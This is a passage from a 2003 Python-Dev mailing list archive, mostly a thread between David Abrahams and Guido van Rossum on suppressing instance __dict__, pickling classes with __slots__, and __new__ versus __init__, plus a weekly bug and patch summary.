clearly marked as Python News in the Newsticker :-)

Thanks and have a nice day!

Tino


From dave@boost-consulting.com  Sat Mar 22 23:25:00 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 22 Mar 2003 18:25:00 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
Message-ID: <ur88zougj.fsf@boost-consulting.com>

I am generating extension types derived from a type which is derived
from int 'int' by calling the metaclass; in order to prevent instances
of the most-derived type from getting an instance __dict__ I am
putting an empty tuple in the class __dict__ as '__slots__'.  The
problem with this hack is that it disables pickling of these babies:

   "a class that defines __slots__ without defining __getstate__
    cannot be pickled"

Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
only one that can actually do any work, since ints are immutable),
but I was wondering if there's a more straightforward way to suppress
the instance __dict__ in the derived classes.

TIA,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From martin@v.loewis.de  Sun Mar 23 08:24:51 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 23 Mar 2003 09:24:51 +0100
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <ur88zougj.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
Message-ID: <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
> only one that can actually do any work, since ints are immutable),
> but I was wondering if there's a more straightforward way to suppress
> the instance __dict__ in the derived classes.

Setting tp_dictoffset to 0 might help. However, I'm unsure what
consequences this has; read the source.

Regards,
Martin


From dave@boost-consulting.com  Sun Mar 23 12:58:30 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 07:58:30 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de> (martin@v.loewis.de's
 message of "23 Mar 2003 09:24:51 +0100")
References: <ur88zougj.fsf@boost-consulting.com>
 <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de>
Message-ID: <uel4yjl3d.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. L=F6wis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
>> only one that can actually do any work, since ints are immutable),
>> but I was wondering if there's a more straightforward way to suppress
>> the instance __dict__ in the derived classes.
>
> Setting tp_dictoffset to 0 might help.=20

AFAICT I don't get to do that, since as I wrote:

       I am generating extension types derived from a type which is
       derived from int 'int' by calling the metaclass
                              ^^^^^^^^^^^^^^^^^^^^^^^^

> However, I'm unsure what consequences this has; read the source.

Unfortunately, this is one of the twistiest areas of the Python
source, so while I could struggle through it I'm hoping there's
someone around here who knows the answer off the top of his benevolent
Dutch head <wink>

--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From skip@mojam.com  Sun Mar 23 13:00:21 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 23 Mar 2003 07:00:21 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303231300.h2ND0LH14101@manatee.mojam.com>

Bug/Patch Summary
-----------------

372 open / 3479 total bugs (+23)
133 open / 2033 total patches (+11)

New Bugs
--------

ncurses/curses on solaris (2003-03-10)
	http://python.org/sf/700780
Compiler Limits (indentation) (2003-03-10)
	http://python.org/sf/700827
WINDOW in py_curses.h needs ncurses-devel (2003-03-11)
	http://python.org/sf/701751
configure option --enable-shared make problems  (2003-03-11)
	http://python.org/sf/701823
Thread running (os.system or popen#) (2003-03-11)
	http://python.org/sf/701836
getsockopt/setsockopt with SO_RCVTIMEO are inconsistent (2003-03-11)
	http://python.org/sf/701936
--without-cxx flag of configure isn't documented. (2003-03-12)
	http://python.org/sf/702147
No documentation of static/dynamic python modules. (2003-03-12)
	http://python.org/sf/702157
dumbdbm __del__ bug (2003-03-12)
	http://python.org/sf/702775
deepcopy can't copy self-referential new-style classes (2003-03-13)
	http://python.org/sf/702858
os.utime can fail with TypeError (2003-03-13)
	http://python.org/sf/703066
os.popen with mode "rb" fails on Unix (2003-03-13)
	http://python.org/sf/703198
Several objects don't decref tmp on failure in subtype_new (2003-03-14)
	http://python.org/sf/703666
strange warnings messages in interpreter (2003-03-14)
	http://python.org/sf/703779
Problems printing and sleep (2003-03-15)
	http://python.org/sf/704194
_tkinter.c won't build w/o threads? (2003-03-16)
	http://python.org/sf/704641
Problems building python with tkinter on HPUX... (2003-03-17)
	http://python.org/sf/704919
python-mode.el: sexp commands don't understand Python (2003-03-17)
	http://python.org/sf/705005
imap docs: s/criterium/criterion/ (2003-03-17)
	http://python.org/sf/705120
Assertion  failed, python aborts (2003-03-17)
	http://python.org/sf/705231
Error when using PyZipFile to create archive (2003-03-17)
	http://python.org/sf/705295
test_atexit fails in directories with spaces (2003-03-18)
	http://python.org/sf/705792
python accepts illegal "import mod.sub as name" syntax (2003-03-19)
	http://python.org/sf/706253
print raises exception when no console available (2003-03-19)
	http://python.org/sf/706263
test_socket fails when not connected (2003-03-19)
	http://python.org/sf/706450
u''.translate not documented (2003-03-19)
	http://python.org/sf/706546
Expose FinderInfo in FSCatalogInfo (2003-03-19)
	http://python.org/sf/706585
Crbon.File.FSSpec should accept non-existing pathnames (2003-03-19)
	http://python.org/sf/706592
codecs.open and iterators (2003-03-19)
	http://python.org/sf/706595
timeouts incompatible w/ line-oriented protocols (2003-03-20)
	http://python.org/sf/707074
-i -u options give SyntaxError on Windows (2003-03-21)
	http://python.org/sf/707576
elisp: IM-python menu and newline in function defs (2003-03-21)
	http://python.org/sf/707707
math.fabs documentation is misleading (2003-03-22)
	http://python.org/sf/708205
DistributionMetaData error ? (2003-03-23)
	http://python.org/sf/708320

New Patches
-----------

Replacing and deleting files in a zipfile archive. (2003-03-10)
	http://python.org/sf/700858
Wrong prototype for PyUnicode_Splitlines on documentation (2003-03-11)
	http://python.org/sf/701395
more apply removals (2003-03-11)
	http://python.org/sf/701494
Reloading pseudo modules (2003-03-11)
	http://python.org/sf/701743
AE Inheritance fixes (2003-03-12)
	http://python.org/sf/702620
Kill off docs for unsafe macros (2003-03-13)
	http://python.org/sf/702933
add direct access to MD5 compression function to md5 module (2003-03-16)
	http://python.org/sf/704676
Fix a few broken links in pydoc (2003-03-19)
	http://python.org/sf/706338
fix bug #685846: raw_input defers signals (2003-03-19)
	http://python.org/sf/706406
Adds Mock Object support to unittest.TestCase (2003-03-19)
	http://python.org/sf/706590
time.tzset standards compliance update (2003-03-19)
	http://python.org/sf/706707
fix bug #682813: dircache.listdir doesn't signal error (2003-03-20)
	http://python.org/sf/707167
Improve code generation (2003-03-20)
	http://python.org/sf/707257
Allow range() to return long integer values (2003-03-21)
	http://python.org/sf/707427
fix for #698517, Tkinter and tk8.4.2 (2003-03-21)
	http://python.org/sf/707701
bug fix 702858: deepcopying reflexive objects (2003-03-21)
	http://python.org/sf/707900
TelnetPopen3, TelnetBase, Expect split (2003-03-22)
	http://python.org/sf/708007
unchecked return value in import.c (2003-03-22)
	http://python.org/sf/708201

Closed Bugs
-----------

printing email object deletes whitespace (2002-08-13)
	http://python.org/sf/594893
asynchat problems multi-threaded (2002-08-14)
	http://python.org/sf/595217
plat-mac not on sys.path (2003-01-03)
	http://python.org/sf/661521
codec registry and Python embedding problem (2003-01-06)
	http://python.org/sf/663074
email.Header() encoding does not work properly (2003-01-27)
	http://python.org/sf/675420
Applet support is broken (2003-02-18)
	http://python.org/sf/688907
test_cpickle overflows stack on MacOS9 (2003-02-21)
	http://python.org/sf/690622
PyMac_GetFSRef should accept unicode (2003-03-02)
	http://python.org/sf/696253
test_posix fails: getlogin (2003-03-04)
	http://python.org/sf/697556
list.index() bhvr change > python2.x (2003-03-06)
	http://python.org/sf/698561
Tutorial uses omitted slice indices before explaining them (2003-03-06)
	http://python.org/sf/699237
ncurses/curses on solaris (2003-03-07)
	http://python.org/sf/699379
MIMEText's c'tor adds unwanted trailing newline to text (2003-03-07)
	http://python.org/sf/699600

Closed Patches
--------------

Put IDE scripts in ~/Library (2002-07-08)
	http://python.org/sf/578667
Fix: asynchat.py: endless loop (2002-12-06)
	http://python.org/sf/649762
(email) Escape backslashes in specialsre and escapesre (2003-01-06)
	http://python.org/sf/663369
HTMLParser -- allow &quot;,&quot; in attributes (2003-01-17)
	http://python.org/sf/669683
test_htmlparser.py -- &quot;,&quot; in attributes (2003-01-24)
	http://python.org/sf/674448
Add tzset method to time module (2003-01-27)
	http://python.org/sf/675422
bundlebuilder: Add dylibs, frameworks to the bundle (2003-02-06)
	http://python.org/sf/681927
allow proxy server authentication with pimp (2003-03-02)
	http://python.org/sf/696392
optparse unit tests + fixes (2003-03-05)
	http://python.org/sf/697939


From mwh@python.net  Sun Mar 23 13:08:30 2003
From: mwh@python.net (Michael Hudson)
Date: Sun, 23 Mar 2003 13:08:30 +0000
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <uel4yjl3d.fsf@boost-consulting.com> (David Abrahams's message
 of "Sun, 23 Mar 2003 07:58:30 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de>
 <uel4yjl3d.fsf@boost-consulting.com>
Message-ID: <2my936kz75.fsf@starship.python.net>

David Abrahams <dave@boost-consulting.com> writes:

> Unfortunately, this is one of the twistiest areas of the Python
> source, so while I could struggle through it I'm hoping there's
> someone around here who knows the answer off the top of his benevolent
> Dutch head <wink>

Well, I'm familiar enough with that bit of the source (search for
"add_dict" in typeobject.c) to answer your question: no, there's no
more straightforward way to suppress the instance __dict__ in the
derived classes.

Cheers,
M.

-- 
 The rapid establishment of social ties, even of a fleeting nature,
 advance not only that goal but its standing in the uberconscious
 mesh of communal psychic, subjective, and algorithmic interbeing.
 But I fear I'm restating the obvious.  -- Will Ware, comp.lang.python


From guido@python.org  Sun Mar 23 13:21:12 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 08:21:12 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sat, 22 Mar 2003 18:25:00 EST."
 <ur88zougj.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
Message-ID: <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>

> I am generating extension types derived from a type which is derived
> from int 'int' by calling the metaclass; in order to prevent instances
> of the most-derived type from getting an instance __dict__ I am
> putting an empty tuple in the class __dict__ as '__slots__'.  The
> problem with this hack is that it disables pickling of these babies:
> 
>    "a class that defines __slots__ without defining __getstate__
>     cannot be pickled"
> 
> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
> only one that can actually do any work, since ints are immutable),
> but I was wondering if there's a more straightforward way to suppress
> the instance __dict__ in the derived classes.

Actually, even __getinitargs__ won't work, because __init__ is called
after the object is created.  In Python 2.3, you'd use __getnewargs__,
but I expect you're still bound to supporting Python 2.2 (Python 2.3
also doesn't have the error message above when pickling).

I think you could subclass the metaclass, override __new__, and delete
the bogus __getstate__ from the type's __dict__.  Then you'll get the
default pickling behavior which ignores slots; that should work just
fine in your case. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From dave@boost-consulting.com  Sun Mar 23 14:48:53 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 09:48:53 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 08:21:12 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uof42i1ey.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> I am generating extension types derived from a type which is derived
>> from int 'int' by calling the metaclass; in order to prevent instances
>> of the most-derived type from getting an instance __dict__ I am
>> putting an empty tuple in the class __dict__ as '__slots__'.  The
>> problem with this hack is that it disables pickling of these babies:
>> 
>>    "a class that defines __slots__ without defining __getstate__
>>     cannot be pickled"
>> 
>> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
>> only one that can actually do any work, since ints are immutable),
>> but I was wondering if there's a more straightforward way to suppress
>> the instance __dict__ in the derived classes.
>
> Actually, even __getinitargs__ won't work, because __init__ is called
> after the object is created.  

...and ints are immutable.  Right.

> In Python 2.3, you'd use __getnewargs__,

Cute.  

It's almost too bad that the distinction between __new__ and __init__
is there -- as we find we need to legitimize the use of __new__ with
things like __getnewargs__ it be comes a little less clear which one
should be used, and when.  TIMTOWDI and all that.

In the absence of clear guidelines I'm tempted to suggest that C++ got
this part right.  Occasionally we get people who think they want to
call overridden virtual functions from constructors (I presume the
analogous thing could be done safely from __init__ but not from
__new__) but that's pretty rare.  I'm interested in gaining insight
into the Pythonic thinking behind __new__/__init__; I'm sure I don't
have the complete picture.

> but I expect you're still bound to supporting Python 2.2

Yup, I think it would be bad to force my users to move to an
unreleased Python version at this point ;-)

> (Python 2.3 also doesn't have the error message above when
> pickling).

Nice. Too bad about 2.2.

> I think you could subclass the metaclass, override __new__, and delete
> the bogus __getstate__ from the type's __dict__.  Then you'll get the
> default pickling behavior which ignores slots; that should work just
> fine in your case. :-)

Ooh, that's sneaky!  But I can't quite see how it works.  The error
message I quoted at the top about __getstate__ happens when you try to
pickle an instance of the class.  If I delete __getstate__ during
__new__, it won't be there for pickle to find when I try to do the
pickling.  What will keep it from inducing the same error?

Thanks,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From pedronis@bluewin.ch  Sun Mar 23 14:46:08 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 23 Mar 2003 15:46:08 +0100
Subject: [Python-Dev] [ot] offline
Message-ID: <009801c2f14a$f0ba2480$6d94fea9@newmexico>

I will be essentially offline for the next 2 weeks.

regards.


From dave@boost-consulting.com  Sun Mar 23 16:41:17 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 11:41:17 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 10:46:40 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uvfyayr0y.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> > I think you could subclass the metaclass, override __new__, and delete
>> > the bogus __getstate__ from the type's __dict__.  Then you'll get the
>> > default pickling behavior which ignores slots; that should work just
>> > fine in your case. :-)
>> 
>> Ooh, that's sneaky!  But I can't quite see how it works.  The error
>> message I quoted at the top about __getstate__ happens when you try to
>> pickle an instance of the class.  If I delete __getstate__ during
>> __new__, it won't be there for pickle to find when I try to do the
>> pickling.  What will keep it from inducing the same error?
>
> Just try it.  There are many ways to customize pickling, and if
> __getstate__ doesn't exist, pickling is done differently.

Since this doesn't work:

    >>> d = type('d', (object,), { '__slots__' : ['foo'] } )
    >>> pickle.dumps(d())

I'm still baffled as to why this works:

    >>> class mc(type):
    ...     def __new__(self, *args):
    ...             x = type.__new__(self, *args)
    ...             del args[2]['__getstate__']
    ...             return x
    ...
    >>> c = mc('c', (object,), { '__slots__' : ['foo'], '__getstate__' : lambda self: tuple() } )
    >>> pickle.dumps(c())
    'ccopy_reg\n_reconstructor\np0\n(c__main__\nc\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.'

especially since:

    >>> dir(d) == dir(c)
    1

I don't see the logic in the source for object.__reduce__(), so where
is it?  OK, I see it in typeobject.c.  But now:

    >>> c.__getstate__
    <unbound method c.<lambda>>

OK, this seems to indicate that my attempt to remove __getstate__ from
the class __dict__ was a failure.  That explains why pickling c works,
but not why you suggested that I remove __getstate__ inside of
__new__.  Did you mean for me to do something different?

I note that c's __slots__ aren't pickled at all, which I guess was the
point of the __getstate__ requirement:

    >>> x = c()
    >>> x.foo = 1
    >>> pickle.dumps(x) == pickle.dumps(c())
    1

Fortunately, in our case the __slots__ are empty so it doesn't matter.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Sun Mar 23 21:04:16 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 16:04:16 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sun, 23 Mar 2003 11:41:17 EST."
 <uvfyayr0y.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net>
 <uvfyayr0y.fsf@boost-consulting.com>
Message-ID: <200303232104.h2NL4GQ04819@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum <guido@python.org> writes:
> >> > I think you could subclass the metaclass, override __new__, and delete
> >> > the bogus __getstate__ from the type's __dict__.  Then you'll get the
> >> > default pickling behavior which ignores slots; that should work just
> >> > fine in your case. :-)

[David]
> >> Ooh, that's sneaky!  But I can't quite see how it works.  The error
> >> message I quoted at the top about __getstate__ happens when you try to
> >> pickle an instance of the class.  If I delete __getstate__ during
> >> __new__, it won't be there for pickle to find when I try to do the
> >> pickling.  What will keep it from inducing the same error?

[Guido]
> > Just try it.  There are many ways to customize pickling, and if
> > __getstate__ doesn't exist, pickling is done differently.
> 
> Since this doesn't work:
> 
>     >>> d = type('d', (object,), { '__slots__' : ['foo'] } )
>     >>> pickle.dumps(d())

Um, you're changing the rules in the middle of the game.  You said you
had an *empty* __slots__.  My recommendation only applied to that
case.  I also thought you were doing this from C, not from Python, but
I may be mistaken.

> I'm still baffled as to why this works:
> 
>     >>> class mc(type):
>     ...     def __new__(self, *args):
>     ...             x = type.__new__(self, *args)
>     ...             del args[2]['__getstate__']

Hm.  I don't think that x.__dict__ is args[2]; it's a copy, and
deleting __getstate__ from the arguments doesn't make any difference
to this example.

>     ...             return x
>     ...
>     >>> c = mc('c', (object,), { '__slots__' : ['foo'], '__getstate__' : lambda self: tuple() } )

Why are you passing a __getstate__ in?  The point was getting rid of
the __getstate__ that type.__new__ inserts.

>     >>> pickle.dumps(c())
>     'ccopy_reg\n_reconstructor\np0\n(c__main__\nc\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.'
> 
> especially since:
> 
>     >>> dir(d) == dir(c)
>     1

I think you have been testing something very different from what you
think you did here.  dir(d) == dir(c) because they both have a
__getstate__; but d.__getstate__ is a built-in that raises an
exception, while c.__getstate__ is the lambda you passed in.

And have you tried unpickling yet?  I expect it to fail.

> I don't see the logic in the source for object.__reduce__(), so where
> is it?  OK, I see it in typeobject.c.  But now:
> 
>     >>> c.__getstate__
>     <unbound method c.<lambda>>
> 
> OK, this seems to indicate that my attempt to remove __getstate__ from
> the class __dict__ was a failure.  That explains why pickling c works,
> but not why you suggested that I remove __getstate__ inside of
> __new__.  Did you mean for me to do something different?

Yes.  I was assuming you'd do this at the C level.  To do what I
suggested in Python, I think you'd have to write this:

    class M(type):
        def __new__(cls, name, bases, dict):
	    C = type.__new__(cls, name, bases, dict)
	    del C.__getstate__
	    return C

> I note that c's __slots__ aren't pickled at all, which I guess was the
> point of the __getstate__ requirement:
> 
>     >>> x = c()
>     >>> x.foo = 1
>     >>> pickle.dumps(x) == pickle.dumps(c())
>     1
> 
> Fortunately, in our case the __slots__ are empty so it doesn't matter.

Right.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar 23 21:15:15 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 16:15:15 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sun, 23 Mar 2003 09:48:53 EST."
 <uof42i1ey.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
Message-ID: <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>

> It's almost too bad that the distinction between __new__ and __init__
> is there -- as we find we need to legitimize the use of __new__ with
> things like __getnewargs__ it be comes a little less clear which one
> should be used, and when.  TIMTOWDI and all that.

__new__ creates a new, initialized object.  __init__ sets some values
in an exsting object.  __init__ is a regular method and can be called
to reinitialize an existing object (not that I recommend this, but the
mechanism doesn't forbid it).  It follows that immutable objects must
be initialized using __new__, since by the time __init__ is called the
object already exists and is immutable.

> In the absence of clear guidelines I'm tempted to suggest that C++ got
> this part right.

Of course you would.

I tend to think that Python's analogon to C++ constructors is __new__,
and that __init__ is a different mechanism (although it can often be
used where you would use a constructor in C++).

> Occasionally we get people who think they want to call overridden
> virtual functions from constructors (I presume the analogous thing
> could be done safely from __init__ but not from __new__)

Whether or not that can be done safely from __init__ depends on the
subclass __init__; it's easy enough to construct examples that don't
work.  But yes, for __new__ the situation is more analogous to C++,
except that AFAIK in C++ when you try that you get the base class
virtual function, while in Python you get the overridden method --
which finds an instance that is incompletely initialized.

> but that's pretty rare.  I'm interested in gaining insight into the
> Pythonic thinking behind __new__/__init__; I'm sure I don't have the
> complete picture.

__new__ was introduced to allow initializing immutable objects. It
really applies more to types implemented in C than types implemented
in Python.  But it is needed so that a Python subclass of an immutable
C base classs can pass arguments of its choice to the C base class's
constructor.

> Nice. Too bad about 2.2.

Maybe the new pickling could be backported, but I fear that it depends
on some other 2.3 feature that's harder to backport, so I haven't
looked into this.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From dave@boost-consulting.com  Sun Mar 23 21:45:48 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 16:45:48 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303232104.h2NL4GQ04819@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 16:04:16 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net>
 <uvfyayr0y.fsf@boost-consulting.com>
 <200303232104.h2NL4GQ04819@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <ur88xoiyb.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> Guido van Rossum <guido@python.org> writes:
>> >> > I think you could subclass the metaclass, override __new__, and delete
>> >> > the bogus __getstate__ from the type's __dict__.  Then you'll get the
>> >> > default pickling behavior which ignores slots; that should work just
>> >> > fine in your case. :-)
>
> [David]
>> >> Ooh, that's sneaky!  But I can't quite see how it works.  The error
>> >> message I quoted at the top about __getstate__ happens when you try to
>> >> pickle an instance of the class.  If I delete __getstate__ during
>> >> __new__, it won't be there for pickle to find when I try to do the
>> >> pickling.  What will keep it from inducing the same error?
>
> [Guido]
>> > Just try it.  There are many ways to customize pickling, and if
>> > __getstate__ doesn't exist, pickling is done differently.
>> 
>> Since this doesn't work:
>> 
>>     >>> d = type('d', (object,), { '__slots__' : ['foo'] } )
>>     >>> pickle.dumps(d())
>
> Um, you're changing the rules in the middle of the game.  You said you
> had an *empty* __slots__.  

I did.  I just stuck something in there so I could verify that things
were working in the expected way.

> My recommendation only applied to that case.  I also thought you
> were doing this from C, not from Python, but I may be mistaken.

You're not mistaken; Just like Python gives a productivity boost over
C/C++ for ordinary programming, I find I can learn a lot more about
the Python core in a short period of time by writing Python code than
by writing 'C' code, so I usually try that first.

>> I'm still baffled as to why this works:
>> 
>>     >>> class mc(type):
>>     ...     def __new__(self, *args):
>>     ...             x = type.__new__(self, *args)
>>     ...             del args[2]['__getstate__']
>
> Hm.  I don't think that x.__dict__ is args[2]; it's a copy, and
> deleting __getstate__ from the arguments doesn't make any difference
> to this example.

...as I discovered...

>>     ...             return x
>>     ...
>>     >>> c = mc('c', (object,), { '__slots__' : ['foo'], '__getstate__' : lambda self: tuple() } )
>
> Why are you passing a __getstate__ in?  The point was getting rid of
> the __getstate__ that type.__new__ inserts.

Because I didn't understand your intention, nor did I know that the
automatic __getstate__ was responsible for generating the error
message.  I thought the idea was to define a __getstate__, which is a
known way to suppress the error message, and then kill it in __new__.
I figured that pickle was looking for __getstate__ and when it wasn't
there but __slots__ was, rasing the exception.  This may explain why I
didn't see how the approach could work.

Now I understand what you meant.

>>     >>> pickle.dumps(c())
>>     'ccopy_reg\n_reconstructor\np0\n(c__main__\nc\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.'
>> 
>> especially since:
>> 
>>     >>> dir(d) == dir(c)
>>     1
>
> I think you have been testing something very different from what you
> think you did here.  dir(d) == dir(c) because they both have a
> __getstate__; but d.__getstate__ is a built-in that raises an
> exception, while c.__getstate__ is the lambda you passed in.

Yeah, I found that out below.

> And have you tried unpickling yet?  I expect it to fail.

Nope.

>> I don't see the logic in the source for object.__reduce__(), so where
>> is it?  OK, I see it in typeobject.c.  But now:
>> 
>>     >>> c.__getstate__
>>     <unbound method c.<lambda>>
>> 
>> OK, this seems to indicate that my attempt to remove __getstate__ from
>> the class __dict__ was a failure.  That explains why pickling c works,
>> but not why you suggested that I remove __getstate__ inside of
>> __new__.  Did you mean for me to do something different?
>
> Yes.  I was assuming you'd do this at the C level.  To do what I
> suggested in Python, I think you'd have to write this:
>
>     class M(type):
>       def __new__(cls, name, bases, dict):
>       C = type.__new__(cls, name, bases, dict)
>       del C.__getstate__
>       return C

I tried to get too fancy with del C.__dict__['__getstate__'] which
didn't work of course.  Anyway, thanks for spelling it out for me.  I
think I understand everything now.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From dave@boost-consulting.com  Sun Mar 23 21:53:09 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 16:53:09 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 16:15:15 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uof41oim2.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> It's almost too bad that the distinction between __new__ and
>> __init__ is there -- as we find we need to legitimize the use of
>> __new__ with things like __getnewargs__ it be comes a little less
>> clear which one should be used, and when.  TIMTOWDI and all that.
>
> __new__ creates a new, initialized object.  __init__ sets some values
> in an exsting object.  __init__ is a regular method and can be called
> to reinitialize an existing object (not that I recommend this, but the
> mechanism doesn't forbid it).  It follows that immutable objects must
> be initialized using __new__, since by the time __init__ is called the
> object already exists and is immutable.

Shouldn't most objects be initialized by __new__, really?  IME it's
dangerous to have uninitialized objects floating about, especially in
the presence of exceptions.

>> In the absence of clear guidelines I'm tempted to suggest that C++ got
>> this part right.
>
> Of course you would.

Oh, c'mon.  C++ is ugly, both brittle *and* inflexible, expensive,
painful, etc.  There must be at least _one_ well-designed thing about
it.  Maybe this is it!

> I tend to think that Python's analogon to C++ constructors is
> __new__,

Yup.

> and that __init__ is a different mechanism (although it can often be
> used where you would use a constructor in C++).
>
>> Occasionally we get people who think they want to call overridden
>> virtual functions from constructors (I presume the analogous thing
>> could be done safely from __init__ but not from __new__)
>
> Whether or not that can be done safely from __init__ depends on the
> subclass __init__; it's easy enough to construct examples that don't
> work.  But yes, for __new__ the situation is more analogous to C++,
> except that AFAIK in C++ when you try that you get the base class
> virtual function, while in Python you get the overridden method --
> which finds an instance that is incompletely initialized.

Either one seems equally likely to be what you don't want.

>> but that's pretty rare.  I'm interested in gaining insight into the
>> Pythonic thinking behind __new__/__init__; I'm sure I don't have the
>> complete picture.
>
> __new__ was introduced to allow initializing immutable objects. It
> really applies more to types implemented in C than types implemented
> in Python.  But it is needed so that a Python subclass of an immutable
> C base classs can pass arguments of its choice to the C base class's
> constructor.
>
>> Nice. Too bad about 2.2.
>
> Maybe the new pickling could be backported, but I fear that it depends
> on some other 2.3 feature that's harder to backport, so I haven't
> looked into this.

Are people who don't want to upgrade really that much more willing if
it doesn't involve a minor revision number?  I figure that if I
supported 2.2 once, I'd have to be very circumspect about doing
something which required an upgrade to 2.2.x.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Sun Mar 23 22:33:59 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 17:33:59 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sun, 23 Mar 2003 16:53:09 EST."
 <uof41oim2.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>
 <uof41oim2.fsf@boost-consulting.com>
Message-ID: <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net>

[David]
> >> It's almost too bad that the distinction between __new__ and
> >> __init__ is there -- as we find we need to legitimize the use of
> >> __new__ with things like __getnewargs__ it be comes a little less
> >> clear which one should be used, and when.  TIMTOWDI and all that.

[Guido]
